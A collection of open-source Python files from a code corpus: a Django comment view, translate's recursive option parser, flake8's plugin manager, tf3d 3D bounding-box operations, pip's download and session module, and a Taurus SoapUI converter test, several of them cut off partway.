  assert res['OK']
  res = gDataStoreClient.commit()
  assert res['OK']
  # now removing that record
  res = gDataStoreClient.remove(record)
  assert res['OK']
|
kdimitrov92/Portfolio | portfolio/portfolio/views/comments.py | Python | gpl-2.0 | 789 | 0 | from django.shortcuts import redirect
from portfolio.models.comments import PhotoComment
from portfolio.mod | els.photos import Photo
from portfolio.views.base import AuthenticatedView
class CommentPhotoView(AuthenticatedView):
    """ View that handles commenting on a photo """

    def post(self, request):
        """Create a comment on a photo and redirect back to it.

        Redirects to the home page when no photo id was posted.
        """
        comment_content = request.POST.get('comment', '')
        photo = request.POST.get('photo', 0)
        # Only persist when both a non-empty comment and a photo id arrived.
        if comment_content and photo:
            comment = PhotoComment(
                photo=Photo.objects.get(id=photo),
                owner=request.user,
                content=comment_content
            )
            comment.save()
        if not photo:
            return redirect('portfolio.home')
        return redirect('portfolio.photo.view', photo_id=photo)
|
mail-apps/translate | translate/misc/optrecurse.py | Python | gpl-2.0 | 32,292 | 0.002044 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2002-2006 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import fnmatch
import logging
import optparse
import os.path
import re
import six
import sys
import traceback
from io import BytesIO
from translate import __version__
from translate.misc import progressbar
class ManPageOption(optparse.Option, object):
    """optparse Option subclass that adds a custom ``manpage`` action."""

    ACTIONS = optparse.Option.ACTIONS + ("manpage",)

    def take_action(self, action, dest, opt, value, values, parser):
        """take_action that can handle manpage as well as standard actions"""
        if action != "manpage":
            # Everything else is handled by the stock optparse machinery.
            return super(ManPageOption, self).take_action(
                action, dest, opt, value, values, parser)
        parser.print_manpage()
        sys.exit(0)
class ManHelpFormatter(optparse.HelpFormatter):
    """Help formatter that renders option strings in groff/man markup."""

    def __init__(self,
                 indent_increment=0,
                 max_help_position=0,
                 width=80,
                 short_first=1):
        optparse.HelpFormatter.__init__(
            self, indent_increment, max_help_position, width, short_first)

    def format_option_strings(self, option):
        """Return a comma-separated list of option strings & metavariables."""
        shorts = list(option._short_opts)
        longs = list(option._long_opts)
        if option.takes_value():
            # Metavariable rendered in italic (\fI...\fP).
            metavar = '\\fI%s\\fP' % (option.metavar or option.dest.upper())
            shorts = [name + metavar for name in shorts]
            longs = [name + "\\fR=\\fP" + metavar for name in longs]
        ordered = (shorts + longs) if self.short_first else (longs + shorts)
        # Bold the whole option list; separate alternatives with roman ", ".
        return '\\fB%s\\fP' % ("\\fR, \\fP".join(ordered))
class RecursiveOptionParser(optparse.OptionParser, object):
"""A specialized Option Parser for recursing through directories."""
    def __init__(self, formats, usetemplates=False, allowmissingtemplate=False,
                 description=None):
        """Construct the specialized Option Parser.

        :type formats: Dictionary
        :param formats: See :meth:`~.RecursiveOptionParser.setformats`
            for an explanation of the formats parameter.
        :param usetemplates: forwarded to :meth:`setformats`
        :param allowmissingtemplate: stored on the instance; presumably lets
            processing continue without a template -- TODO confirm against
            the rest of the class (not visible here).
        :param description: passed through to :class:`optparse.OptionParser`
        """
        optparse.OptionParser.__init__(self, version="%prog " + __version__.sver,
                                       description=description)
        self.setmanpageoption()
        self.setprogressoptions()
        self.seterrorleveloptions()
        self.setformats(formats, usetemplates)
        # NOTE(review): populated elsewhere; appears to collect options that
        # are passed through unchanged -- confirm in the full class.
        self.passthrough = []
        self.allowmissingtemplate = allowmissingtemplate
        logging.basicConfig(format="%(name)s: %(levelname)s: %(message)s")
def get_prog_name(self):
return os.path.basename(sys.argv[0])
def setmanpageoption(self):
"""creates a manpage option that allows the optionparser to generate a
manpage"""
manpageoption = ManPageOption(None, "--manpage", dest="manpage",
default=False, action="manpage",
help="output a manpage based on the help")
self.define_option(manpageoption)
def format_manpage(self):
"""returns a formatted manpage"""
result = []
prog = self.get_prog_name()
formatprog = lambda x: x.replace("%prog", prog)
formatToolkit = lambda x: x.replace("%prog", "Translate Toolkit")
result.append('.\\" Autogenerated manpage\n')
result.append('.TH %s 1 "%s" "" "%s"\n' % (prog,
formatToolkit(self.version),
formatToolkit(self.version)))
result.append('.SH NAME\n')
result.append('%s \\- %s\n' % (self.get_prog_name(),
self.description.split('\n\n')[0]))
result.append('.SH SYNOPSIS\n')
result.append('.PP\n')
usage = "\\fB%prog "
usage += " ".join([self.getusageman(option) for option in self.option_list])
usage += "\\fP"
result.append('%s\n' % formatprog(usage))
description_lines = self.description.split('\n\n')[1:]
if description_lines:
result.append('.SH DESCRIPTION\n')
result.append('\n\n'.join([re.sub('\.\. note::', 'Note:', l)
for l in description_lines]))
result.append('.SH OPTIONS\n')
ManHelpFormatter().store_option_strings(self)
result.append('.PP\n')
for option in self.option_list:
result.append('.TP\n')
result.append('%s\n' % str(option).replace('-', '\-'))
result.append('%s\n' % option.help.replace('-', '\-'))
return "".join(result)
def print_manpage(self, file=None):
"""outputs a manpage for the program using the help information"""
if file is None:
file = sys.stdout
file.write(self.format_manpage())
def set_usage(self, usage=None):
"""sets the usage string - if usage not given, uses getusagestring for
each option"""
if usage is None:
self.usage = "%prog " + " ".join([self.getusagestring(option) for option in self.option_list])
else:
super(RecursiveOptionParser, self).set_usage(usage)
    def warning(self, msg, options=None, exc_info=None):
        """Log a warning message incorporating 'msg', optionally decorated
        with exception detail according to ``options.errorlevel``."""
        if options:
            # errorlevel controls how much of the exception is appended:
            # full traceback, the exception line only, just the message,
            # or nothing at all.
            if options.errorlevel == "traceback":
                errorinfo = "\n".join(traceback.format_exception(exc_info[0],
                                                                 exc_info[1], exc_info[2]))
            elif options.errorlevel == "exception":
                errorinfo = "\n".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
            elif options.errorlevel == "message":
                errorinfo = str(exc_info[1])
            else:
                errorinfo = ""
            if errorinfo:
                msg += ": " + errorinfo
        logging.getLogger(self.get_prog_name()).warning(msg)
def getusagestring(self, option):
"""returns the usage string for the given option"""
optionstring = "|".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "[%s]" % optionstring
if option.metavar:
optionstring += " " + option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "[%s]" % optionstring
def getusageman(self, option):
"""returns the usage string for the given option"""
optionstring = "\\fR|\\fP".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "\\fR[\\fP%s\\fR]\\fP" % optionstring
if option.metavar:
optionstring += " \\fI%s\\fP" % option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "\\fR[\\fP%s\\fR]\\fP" % optionstring
def define_option(self, option):
"""Defines the given option, replacing an exi | sting one of the same short
name if neccessary..."""
for short_opt in option._short_opts:
if self.has_option(short_opt):
self.remove_option(short_opt)
for long_op | t in option._long_opts:
if self.has_option(long_opt):
self.remove_option(long_opt)
self.add_option(option)
|
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/flake8/plugins/manager.py | Python | mit | 17,752 | 0 | """Plugin loading and management logic and classes."""
import logging
import sys
import entrypoints
from flake8 import exceptions
from flake8 import utils
if sys.version_info >= (3, 3):
import collections.abc as collections_abc
else:
import collections as collections_abc
LOG = logging.getLogger(__name__)
__all__ = ("Checkers", "Plugin", "PluginManager", "ReportFormatters")
NO_GROUP_FOUND = object()
class Plugin(object):
    """Wrap an EntryPoint from setuptools and other logic.

    Fixes extraction artifacts that had broken the ``to_dictionary``
    method, and documents ``_load``.
    """

    def __init__(self, name, entry_point, local=False):
        """Initialize our Plugin.

        :param str name:
            Name of the entry-point as it was registered with setuptools.
        :param entry_point:
            EntryPoint returned by setuptools.
        :type entry_point:
            setuptools.EntryPoint
        :param bool local:
            Is this a repo-local plugin?
        """
        self.name = name
        self.entry_point = entry_point
        self.local = local
        # Lazily-computed caches; filled on first property access.
        self._plugin = None
        self._parameters = None
        self._parameter_names = None
        self._group = None
        self._plugin_name = None
        self._version = None

    def __repr__(self):
        """Provide an easy to read description of the current plugin."""
        return 'Plugin(name="{0}", entry_point="{1}")'.format(
            self.name, self.entry_point
        )

    def to_dictionary(self):
        """Convert this plugin to a dictionary."""
        return {
            "name": self.name,
            "parameters": self.parameters,
            "parameter_names": self.parameter_names,
            "plugin": self.plugin,
            "plugin_name": self.plugin_name,
        }

    def is_in_a_group(self):
        """Determine if this plugin is in a group.

        :returns:
            True if the plugin is in a group, otherwise False.
        :rtype:
            bool
        """
        return self.group() is not None

    def group(self):
        """Find and parse the group the plugin is in.

        The group is the part of the entry-point name before the first
        ``.``; ``None`` is returned for ungrouped names.
        """
        if self._group is None:
            name = self.name.split(".", 1)
            if len(name) > 1:
                self._group = name[0]
            else:
                # Sentinel distinguishing "computed, no group" from
                # "not computed yet" (None).
                self._group = NO_GROUP_FOUND
        if self._group is NO_GROUP_FOUND:
            return None
        return self._group

    @property
    def parameters(self):
        """List of arguments that need to be passed to the plugin."""
        if self._parameters is None:
            self._parameters = utils.parameters_for(self)
        return self._parameters

    @property
    def parameter_names(self):
        """List of argument names that need to be passed to the plugin."""
        if self._parameter_names is None:
            self._parameter_names = list(self.parameters)
        return self._parameter_names

    @property
    def plugin(self):
        """Load and return the plugin associated with the entry-point.

        This property implicitly loads the plugin and then caches it.
        """
        self.load_plugin()
        return self._plugin

    @property
    def version(self):
        """Return the version of the plugin."""
        if self._version is None:
            if self.is_in_a_group():
                self._version = version_for(self)
            else:
                self._version = self.plugin.version
        return self._version

    @property
    def plugin_name(self):
        """Return the name of the plugin."""
        if self._plugin_name is None:
            if self.is_in_a_group():
                self._plugin_name = self.group()
            else:
                self._plugin_name = self.plugin.name
        return self._plugin_name

    @property
    def off_by_default(self):
        """Return whether the plugin is ignored by default."""
        return getattr(self.plugin, "off_by_default", False)

    def execute(self, *args, **kwargs):
        r"""Call the plugin with \*args and \*\*kwargs."""
        return self.plugin(*args, **kwargs)  # pylint: disable=not-callable

    def _load(self):
        """Load the entry-point and verify that it is callable."""
        self._plugin = self.entry_point.load()
        if not callable(self._plugin):
            msg = (
                "Plugin %r is not a callable. It might be written for an"
                " older version of flake8 and might not work with this"
                " version" % self._plugin
            )
            LOG.critical(msg)
            raise TypeError(msg)

    def load_plugin(self):
        """Retrieve the plugin for this entry-point.

        This loads the plugin, stores it on the instance and then returns it.
        It does not reload it after the first time, it merely returns the
        cached plugin.

        :returns:
            Nothing
        """
        if self._plugin is None:
            LOG.info('Loading plugin "%s" from entry-point.', self.name)
            try:
                self._load()
            except Exception as load_exception:
                LOG.exception(load_exception)
                failed_to_load = exceptions.FailedToLoadPlugin(
                    plugin=self, exception=load_exception
                )
                LOG.critical(str(failed_to_load))
                raise failed_to_load

    def enable(self, optmanager, options=None):
        """Remove plugin name from the default ignore list."""
        optmanager.remove_from_default_ignore([self.name])
        optmanager.extend_default_select([self.name])
        if not options:
            return
        try:
            options.ignore.remove(self.name)
        except (ValueError, KeyError):
            # options.ignore may be a list (ValueError) or set/dict-like
            # (KeyError) -- either way absence is fine.
            LOG.debug(
                "Attempted to remove %s from the ignore list but it was "
                "not a member of the list.",
                self.name,
            )

    def disable(self, optmanager):
        """Add the plugin name to the default ignore list."""
        optmanager.extend_default_ignore([self.name])

    def provide_options(self, optmanager, options, extra_args):
        """Pass the parsed options and extra arguments to the plugin."""
        parse_options = getattr(self.plugin, "parse_options", None)
        if parse_options is not None:
            LOG.debug('Providing options to plugin "%s".', self.name)
            try:
                parse_options(optmanager, options, extra_args)
            except TypeError:
                # Older plugins accept only the parsed options.
                parse_options(options)
        if self.name in options.enable_extensions:
            self.enable(optmanager, options)

    def register_options(self, optmanager):
        """Register the plugin's command-line options on the OptionManager.

        :param optmanager:
            Instantiated OptionManager to register options on.
        :type optmanager:
            flake8.options.manager.OptionManager
        :returns:
            Nothing
        """
        add_options = getattr(self.plugin, "add_options", None)
        if add_options is not None:
            LOG.debug(
                'Registering options from plugin "%s" on OptionManager %r',
                self.name,
                optmanager,
            )
            add_options(optmanager)
        if self.off_by_default:
            self.disable(optmanager)
class PluginManager(object): # pylint: disable=too-few-public-methods
"""Find and manage plugins consistently."""
    def __init__(self, namespace, local_plugins=None):
        """Initialize the manager.

        :param str namespace:
            Namespace of the plugins to manage, e.g., 'flake8.extension'.
        :param list local_plugins:
            Plugins from config (as "X = path.to:Plugin" strings).
        """
        self.namespace = namespace
        # name -> Plugin mapping and registration-order name list.
        self.plugins = {}
        self.names = []
        # Load config-declared plugins first, then setuptools entry-points.
        self._load_local_plugins(local_plugins or [])
        self._load_entrypoint_plugins()
def _load_local_plugins(self, local_plugins):
"""Load local plugins from config.
:param list local_plugins:
Plugins from config (as "X = path.to:Plugin" strings).
"""
for plugin_str in local_plugins:
name, _, entry_str = plugin_str.partition("=")
name, entry_str = name.strip(), entry_str.strip()
|
google-research/google-research | tf3d/object_detection/box_utils/np_box_list_ops.py | Python | apache-2.0 | 21,691 | 0.006454 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bounding Box List operations for Numpy BoxList3d's.
Example box operations that are supported:
* Volumes: compute bounding box volume
* IOU: pairwise intersection-over-union scores
"""
import numpy as np
from tf3d.object_detection.box_utils import np_box_list
from tf3d.object_detection.box_utils import np_box_ops
class SortOrder(object):
  """Enum class for sort order.

  Attributes:
    ascend: ascend order.
    descend: descend order.
  """
  # Plain integer constants used as sort-direction flags.
  ASCEND = 1
  DESCEND = 2
def copy_boxlist(boxlist, indices=None):
  """Copy the boxes of a BoxList3d object into a new BoxList3d object.

  Args:
    boxlist: A np_box_list.BoxList3d object.
    indices: A indices of the boxes to be copied. It is not used if None.

  Returns:
    new_boxlist: A new np_box_list.BoxList3d object.
  """
  fields = {
      'length': boxlist.get_length(),
      'height': boxlist.get_height(),
      'width': boxlist.get_width(),
      'center_x': boxlist.get_center_x(),
      'center_y': boxlist.get_center_y(),
      'center_z': boxlist.get_center_z(),
  }
  rotation_matrix = boxlist.get_rotation_matrix()
  rotation_z_radians = boxlist.get_rotation_z_radians()
  if indices is not None:
    # Select the requested subset of boxes. Either rotation representation
    # may be absent (None), so only index it when present.
    fields = {name: value[indices] for name, value in fields.items()}
    if rotation_matrix is not None:
      rotation_matrix = rotation_matrix[indices, :, :]
    if rotation_z_radians is not None:
      rotation_z_radians = rotation_z_radians[indices]
  return np_box_list.BoxList3d(
      rotation_matrix=rotation_matrix,
      rotation_z_radians=rotation_z_radians,
      **fields)
def volume(boxlist):
  """Computes area of boxes.

  Args:
    boxlist: BoxList3d holding N boxes.

  Returns:
    A numpy array with shape [N*1] representing box volumes.
  """
  lengths = boxlist.get_length()
  heights = boxlist.get_height()
  widths = boxlist.get_width()
  return np_box_ops.volume(length=lengths, height=heights, width=widths)
def intersection3d(boxlist1, boxlist2):
  """Computes pairwise intersection areas between boxes.

  Args:
    boxlist1: BoxList3d holding N boxes.
    boxlist2: BoxList3d holding M boxes.

  Returns:
    a numpy array with shape [N*M] representing pairwise intersection area
  """
  common_kwargs = dict(
      boxes1_length=boxlist1.get_length(),
      boxes1_height=boxlist1.get_height(),
      boxes1_width=boxlist1.get_width(),
      boxes1_center=boxlist1.get_center(),
      boxes2_length=boxlist2.get_length(),
      boxes2_height=boxlist2.get_height(),
      boxes2_width=boxlist2.get_width(),
      boxes2_center=boxlist2.get_center())
  rotation_matrix1 = boxlist1.get_rotation_matrix()
  rotation_matrix2 = boxlist2.get_rotation_matrix()
  if rotation_matrix1 is not None and rotation_matrix2 is not None:
    # Both boxlists carry full rotation matrices: 9-DOF boxes.
    return np_box_ops.intersection3d_9dof_box(
        boxes1_rotation_matrix=rotation_matrix1,
        boxes2_rotation_matrix=rotation_matrix2,
        **common_kwargs)
  # Otherwise boxes are described by a z-axis rotation angle only (7-DOF).
  return np_box_ops.intersection3d_7dof_box(
      boxes1_rotation_z_radians=boxlist1.get_rotation_z_radians(),
      boxes2_rotation_z_radians=boxlist2.get_rotation_z_radians(),
      **common_kwargs)
def iou3d(boxlist1, boxlist2):
  """Computes pairwise intersection-over-union between box collections.

  Args:
    boxlist1: BoxList3d holding N boxes.
    boxlist2: BoxList3d holding M boxes.

  Returns:
    a numpy array with shape [N, M] representing pairwise iou scores.
  """
  common_kwargs = dict(
      boxes1_length=boxlist1.get_length(),
      boxes1_height=boxlist1.get_height(),
      boxes1_width=boxlist1.get_width(),
      boxes1_center=boxlist1.get_center(),
      boxes2_length=boxlist2.get_length(),
      boxes2_height=boxlist2.get_height(),
      boxes2_width=boxlist2.get_width(),
      boxes2_center=boxlist2.get_center())
  rotation_matrix1 = boxlist1.get_rotation_matrix()
  rotation_matrix2 = boxlist2.get_rotation_matrix()
  if rotation_matrix1 is not None and rotation_matrix2 is not None:
    # Both boxlists carry full rotation matrices: 9-DOF boxes.
    return np_box_ops.iou3d_9dof_box(
        boxes1_rotation_matrix=rotation_matrix1,
        boxes2_rotation_matrix=rotation_matrix2,
        **common_kwargs)
  # Otherwise boxes are described by a z-axis rotation angle only (7-DOF).
  return np_box_ops.iou3d_7dof_box(
      boxes1_rotation_z_radians=boxlist1.get_rotation_z_radians(),
      boxes2_rotation_z_radians=boxlist2.get_rotation_z_radians(),
      **common_kwargs)
def iov3d(boxlist1, boxlist2):
  """Computes pairwise intersection-over-volume between box collections.

  Reconstructed from extraction artifacts that had split
  ``get_rotation_matrix`` and ``boxlist2_rotation_matrix``.

  Args:
    boxlist1: BoxList3d holding N boxes.
    boxlist2: BoxList3d holding M boxes.

  Returns:
    a numpy array with shape [N, M] representing pairwise iov scores.
  """
  boxlist1_rotation_matrix = boxlist1.get_rotation_matrix()
  boxlist2_rotation_matrix = boxlist2.get_rotation_matrix()
  if (boxlist1_rotation_matrix is not None) and (boxlist2_rotation_matrix is
                                                 not None):
    return np_box_ops.iov3d_9dof_box(
        boxes1_length=boxlist1.get_length(),
        boxes1_height=boxlist1.get_height(),
        boxes1_width=boxlist1.get_width(),
        boxes1_center=boxlist1.get_center(),
        boxes1_rotation_matrix=boxlist1.get_rotation_matrix(),
        boxes2_length=boxlist2.get_length(),
        boxes2_height=boxlist2.get_height(),
        boxes2_width=boxlist2.get_width(),
        boxes2_center=boxlist2.get_center(),
        boxes2_rotation_matrix=boxlist2.get_rotation_matrix())
  else:
    return np_box_ops.iov3d_7dof_box(
        boxes1_length=boxlist1.get_length(),
        boxes1_height=boxlist1.get_height(),
        boxes1_width=boxlist1.get_width(),
        boxes1_center=boxlist1.get_center(),
        boxes1_rotation_z_radians=boxlist1.get_rotation_z_radians(),
        boxes2_length=boxlist2.get_length(),
        boxes2_height=boxlist2.get_height(),
        boxes2_width=boxlist2.get_width(),
        boxes2_center=boxlist2.get_center(),
        boxes2_rotation_z_radians=boxlist2.get_rotation_z_radians())
def nuscenes_center_distance_measure(boxlist1, boxlist2):
"""Computes pairwise intersection-over-volume between box collections.
Args:
boxlist1: BoxList3d holding N boxes.
boxlist2: BoxList3d holding M boxes.
Returns:
A numpy array with shape [N, M] representing pairwise closeness scores
based on center distance.
"""
boxes1_center = boxlist1.get_center()
boxes2_center = boxlist2.get_center()
boxes1_center_xy = boxes1_center[:, 0:2]
boxes2_center_xy = boxes2_center[:, 0:2]
distances = np.linalg.norm(
np.expand_dims(boxes1_center_xy, axis=1) -
np.expand_dims(boxes2_center_xy, axis=0),
axis=2)
return 1.0 / |
ppyordanov/HCI_4_Future_Cities | Server/src/virtualenv/Lib/site-packages/pip/download.py | Python | mit | 22,573 | 0.000487 | import cgi
import email.utils
import hashlib
import getpass
import mimetypes
import os
import platform
import re
import shutil
import sys
import tempfile
import pip
from pip.backwardcompat import urllib, urlparse, raw_input
from pip.exceptions import InstallationError, HashMismatch
from pip.util import (splitext, rmtree, format_size, display_path,
backup_dir, ask_path_exists, unpack_file,
create_download_cache_folder, cache_download)
from pip.vcs import vcs
from pip.log import logger
from pip._vendor import requests, six
from pip._vendor.requests.adapters import BaseAdapter
from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth
from pip._vendor.requests.compat import IncompleteRead
from pip._vendor.requests.exceptions import InvalidURL, ChunkedEncodingError
from pip._vendor.requests.models import Response
from pip._vendor.requests.structures import CaseInsensitiveDict
__all__ = ['get_file_content',
'is_url', 'url_to_path', 'path_to_url',
'is_archive_file', 'unpack_vcs_link',
'unpack_file_url', 'is_vcs_url', 'is_file_url', 'unpack_http_url']
def user_agent():
    """Build the User-Agent string sent with pip's HTTP requests.

    Identifies the pip version, the Python implementation
    (CPython/PyPy/Jython/IronPython) with its version, and the
    operating system name/release.
    """
    impl_name = platform.python_implementation()
    if impl_name == 'CPython':
        impl_version = platform.python_version()
    elif impl_name == 'PyPy':
        info = sys.pypy_version_info
        impl_version = '%s.%s.%s' % (info.major, info.minor, info.micro)
        # Non-final PyPy releases carry a suffix such as "alpha0".
        if info.releaselevel != 'final':
            impl_version += info.releaselevel
    elif impl_name in ('Jython', 'IronPython'):
        impl_version = platform.python_version()  # Complete Guess
    else:
        impl_version = 'Unknown'

    # platform calls can raise IOError on some restricted systems.
    try:
        os_name = platform.system()
        os_release = platform.release()
    except IOError:
        os_name = 'Unknown'
        os_release = 'Unknown'

    parts = ['pip/%s' % pip.__version__,
             '%s/%s' % (impl_name, impl_version),
             '%s/%s' % (os_name, os_release)]
    return " ".join(parts)
class MultiDomainBasicAuth(AuthBase):
    """Requests auth handler that remembers basic-auth credentials
    per netloc, strips credentials embedded in URLs, and (optionally)
    prompts the user interactively on a 401 response."""

    def __init__(self, prompting=True):
        # When False, 401 responses are returned as-is instead of
        # prompting on stdin.
        self.prompting = prompting
        # Maps netloc (host[:port], no credentials) -> (user, password).
        self.passwords = {}

    def __call__(self, req):
        """Attach stored/embedded credentials to ``req`` and register
        the 401 handler hook."""
        parsed = urlparse.urlparse(req.url)

        # Get the netloc without any embedded credentials
        netloc = parsed.netloc.split("@", 1)[-1]

        # Set the url of the request to the url without any credentials
        req.url = urlparse.urlunparse(parsed[:1] + (netloc,) + parsed[2:])

        # Use any stored credentials that we have for this netloc
        username, password = self.passwords.get(netloc, (None, None))

        # Extract credentials embedded in the url if we have none stored
        if username is None:
            username, password = self.parse_credentials(parsed.netloc)

        if username or password:
            # Store the username and password
            self.passwords[netloc] = (username, password)

            # Send the basic auth with this request
            req = HTTPBasicAuth(username or "", password or "")(req)

        # Attach a hook to handle 401 responses
        req.register_hook("response", self.handle_401)

        return req

    def handle_401(self, resp, **kwargs):
        """Response hook: on a 401, prompt for credentials, store them,
        and replay the request on the same connection."""
        # We only care about 401 responses, anything else we want to just
        #   pass through the actual response
        if resp.status_code != 401:
            return resp

        # We are not able to prompt the user so simple return the response
        if not self.prompting:
            return resp

        parsed = urlparse.urlparse(resp.url)

        # Prompt the user for a new username and password
        username = raw_input("User for %s: " % parsed.netloc)
        password = getpass.getpass("Password: ")

        # Store the new username and password to use for future requests
        if username or password:
            self.passwords[parsed.netloc] = (username, password)

        # Consume content and release the original connection to allow our new
        #   request to reuse the same one.
        resp.content
        resp.raw.release_conn()

        # Add our new username and password to the request
        req = HTTPBasicAuth(username or "", password or "")(resp.request)

        # Send our new request
        new_resp = resp.connection.send(req, **kwargs)
        new_resp.history.append(resp)

        return new_resp

    def parse_credentials(self, netloc):
        """Return (user, password) parsed from a ``user:pass@host``
        netloc; password (or both) may be None when absent."""
        if "@" in netloc:
            userinfo = netloc.rsplit("@", 1)[0]
            if ":" in userinfo:
                return userinfo.split(":", 1)
            return userinfo, None
        return None, None
class LocalFSResponse(object):
    """Adapt a plain file object to the raw-response interface that
    requests expects from urllib3, for serving file:// URLs."""

    def __init__(self, fileobj):
        self.fileobj = fileobj

    def __getattr__(self, name):
        # Anything not implemented here is delegated to the file object.
        return getattr(self.fileobj, name)

    def read(self, amt=None, decode_content=None, cache_content=False):
        # decode_content / cache_content exist only for signature
        # compatibility; local files need no content decoding.
        return self.fileobj.read(amt)

    # Insert Hacks to Make Cookie Jar work w/ Requests
    @property
    def _original_response(self):
        class _HeaderlessMessage(object):
            def getheaders(self, header):
                return []

            def get_all(self, header, default):
                return []

        class _FakeHTTPResponse(object):
            @property
            def msg(self):
                return _HeaderlessMessage()

        return _FakeHTTPResponse()
class LocalFSAdapter(BaseAdapter):
    """Requests transport adapter that serves ``file://`` URLs from the
    local filesystem instead of going over the network."""

    def send(self, request, stream=None, timeout=None, verify=None, cert=None,
             proxies=None):
        """Build a 200 Response whose body streams the local file.

        Only URLs whose host is exactly ``localhost`` are accepted;
        PipSession rewrites host-less file URLs into that form.
        """
        parsed_url = urlparse.urlparse(request.url)

        # We only work for requests with a host of localhost
        if parsed_url.netloc.lower() != "localhost":
            raise InvalidURL("Invalid URL %r: Only localhost is allowed" %
                             request.url)

        # Drop the netloc so url_to_path sees a plain file URL.
        real_url = urlparse.urlunparse(parsed_url[:1] + ("",) + parsed_url[2:])
        pathname = url_to_path(real_url)

        resp = Response()
        resp.status_code = 200
        resp.url = real_url

        stats = os.stat(pathname)
        modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
        resp.headers = CaseInsensitiveDict({
            "Content-Type": mimetypes.guess_type(pathname)[0] or "text/plain",
            "Content-Length": stats.st_size,
            "Last-Modified": modified,
        })

        # Wrap the file so it quacks like a urllib3 raw response.
        resp.raw = LocalFSResponse(open(pathname, "rb"))
        resp.close = resp.raw.close

        return resp

    def close(self):
        # Nothing to release; required by the BaseAdapter interface.
        pass
class PipSession(requests.Session):
    """requests.Session preconfigured for pip: custom User-Agent,
    per-domain basic auth, ``file://`` URL support, and an optional
    session-wide default timeout."""

    # When set, used as the default ``timeout`` for every request.
    timeout = None

    def __init__(self, *args, **kwargs):
        super(PipSession, self).__init__(*args, **kwargs)

        # Attach our User Agent to the request
        self.headers["User-Agent"] = user_agent()

        # Attach our Authentication handler to the session
        self.auth = MultiDomainBasicAuth()

        # Enable file:// urls
        self.mount("file://", LocalFSAdapter())

    def request(self, method, url, *args, **kwargs):
        """Dispatch a request, normalizing file URLs and applying the
        session default timeout."""
        # Make file:// urls not fail due to lack of a hostname
        parsed = urlparse.urlparse(url)
        if parsed.scheme == "file":
            url = urlparse.urlunparse(parsed[:1] + ("localhost",) + parsed[2:])

        # Allow setting a default timeout on a session
        kwargs.setdefault("timeout", self.timeout)

        # Dispatch the actual request
        return super(PipSession, self).request(method, url, *args, **kwargs)
def get_file_content(url, comes_from=None, session=None):
"""Gets the content of a file; it may be a filename, file: URL, or
http: URL. Returns (location, content). Content is unicode."""
if session is None:
session = PipSession()
match = _scheme_re.search(url)
if match:
|
Blazemeter/taurus | tests/unit/modules/test_SoapUI.py | Python | apache-2.0 | 7,842 | 0.00204 | from bzt.utils import SoapUIScriptConverter
from tests.unit import BZTestCase, RESOURCES_DIR, ROOT_LOGGER
class TestSoapUIConverter(BZTestCase):
    def test_minimal(self):
        """Convert the sample SoapUI project and verify the generated
        executions plus one scenario's variables, requests, headers,
        assertions and extractors."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        config = obj.convert_script(RESOURCES_DIR + "soapui/project.xml")

        # Execution entries mirror the project's test suites/cases.
        self.assertIn("execution", config)
        self.assertEqual(4, len(config["execution"]))
        execution = config["execution"][1]
        self.assertEqual("TestSuite 1-index", execution.get("scenario"))
        self.assertEqual(60, execution.get("hold-for"))
        self.assertEqual(10, execution.get("concurrency"))

        self.assertIn("scenarios", config)
        self.assertIn("TestSuite 1-index", config["scenarios"])
        scenario = config["scenarios"]["TestSuite 1-index"]

        self.assertIn("requests", scenario)
        self.assertEqual(3, len(scenario["requests"]))

        # Project properties become scenario variables.
        self.assertIn("variables", scenario)
        self.assertEqual("foo", scenario["variables"].get("something"))
        self.assertEqual("2", scenario["variables"].get("something_else"))
        self.assertEqual("json", scenario["variables"].get("route_part"))

        first_req = scenario["requests"][0]
        self.assertEqual("http://blazedemo.com/reserve.php", first_req["url"])
        self.assertEqual("test index", first_req["label"])
        self.assertIn("headers", first_req)
        self.assertEqual(first_req["headers"].get("X-Custom-Header"), "Value")
        self.assertIn("assert", first_req)
        self.assertEqual(2, len(first_req["assert"]))
        self.assertEqual("BlazeDemo", first_req["assert"][0]["contains"][0])
        self.assertFalse(first_req["assert"][0]["not"])
        self.assertFalse(first_req["assert"][0]["regexp"])
        self.assertEqual("BlazeDemou", first_req["assert"][1]["contains"][0])
        self.assertTrue(first_req["assert"][1]["not"])
        self.assertTrue(first_req["assert"][1]["regexp"])

        second_req = scenario["requests"][1]
        self.assertEqual("http://example.com/body", second_req["url"])
        self.assertEqual("posty", second_req["label"])
        self.assertEqual("POST", second_req["method"])
        self.assertIn("headers", second_req)
        self.assertEqual(second_req["headers"].get("X-Header"), "X-Value")
        self.assertEqual(second_req["headers"].get("X-Header-2"), "X-Value-2")
        self.assertIn("body", second_req)
        self.assertIn("answer", second_req["body"])
        self.assertEqual('42', second_req["body"]["answer"])
        self.assertIn("extract-xpath", second_req)
        self.assertIn("something_else", second_req["extract-xpath"])
        self.assertEqual("//head", second_req["extract-xpath"]["something_else"]["xpath"])

        # Scenario variables are interpolated into request URLs.
        third_req = scenario["requests"][2]
        self.assertEqual("http://localhost:9999/api/${route_part}", third_req["url"])
